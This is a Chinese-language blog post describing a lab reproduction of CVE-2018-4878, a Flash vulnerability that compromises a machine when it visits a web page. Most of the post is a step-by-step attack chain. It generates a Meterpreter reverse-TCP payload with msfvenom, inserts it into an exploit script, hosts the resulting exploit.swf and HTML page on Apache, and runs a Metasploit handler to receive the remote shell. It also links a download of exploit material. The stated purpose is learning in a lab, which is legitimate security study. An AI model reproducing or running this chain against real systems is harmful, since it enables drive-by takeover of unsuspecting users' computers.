CVE-2018-4878漏洞复现

作者: 泽英君 | 来源:发表于2019-02-09 20:16 被阅读63次

    开篇闲聊:

    写了一篇,意犹未尽,然后决定再来一篇哈哈。

    漏洞概述:

    CVE-2018-4878是一个通杀Flash 28以前版本的漏洞,这个的威力更强,即靶机点击进入一个页面即可瞬间被攻陷!

    可利用的Flash版本号

    复现环境:

    kail linux

    Win7(我的Win10 Flash版本到31了。。。)

    这里我引用一位大佬的复现素材,整理的很好!(链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li)

    复现过程:

    使用msfvenom生成shell代码

    root@wuyou:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.134 lport=8888  -f  python>1.txt

    root@wuyou:~# cat 1.txt

    进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件

    将上面msfvenom生成的代码覆盖掉原来的代码:

    修改下面的路径到自己存放的路径

    进入存放的目录,执行命令:
    root@wuyou:~/CVE-2018-4878# python cve-2018-4878.py

    root@wuyou:~/CVE-2018-4878# ls -l

    然后将其中两个文件放入Apache目录中,命令我已经给你们准备好了:

    root@wuyou:~/CVE-2018-4878# service apache2 start

    root@wuyou:~/CVE-2018-4878# cp index2.html /var/www/html/index2.html

    root@wuyou:~/CVE-2018-4878# cp exploit.swf /var/www/html/exploit.swf

    此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。

    这时开启metasploit

    root@wuyou:~# msfconsole

    msf > use exploit/multi/handler

    msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

    msf exploit(multi/handler) > set lhost 192.168.190.134

    msf exploit(multi/handler) > set lport 8888

    msf exploit(multi/handler) > exploit

    然后在安装了Flash28的Win7上开启页面192.168.190.134/index2.html

    这时渗透机直接获取到Sessions

    大功告成!

    那么,怎么查看自己的的Flash版本呢?

    这里我给大家推荐我自己的方法,在控制面板里找到程序和功能选项

    一般就在第一个左右

    相关文章

      网友评论

        本文标题:CVE-2018-4878漏洞复现

        本文链接:https://www.haomeiwen.com/subject/ikezsqtx.html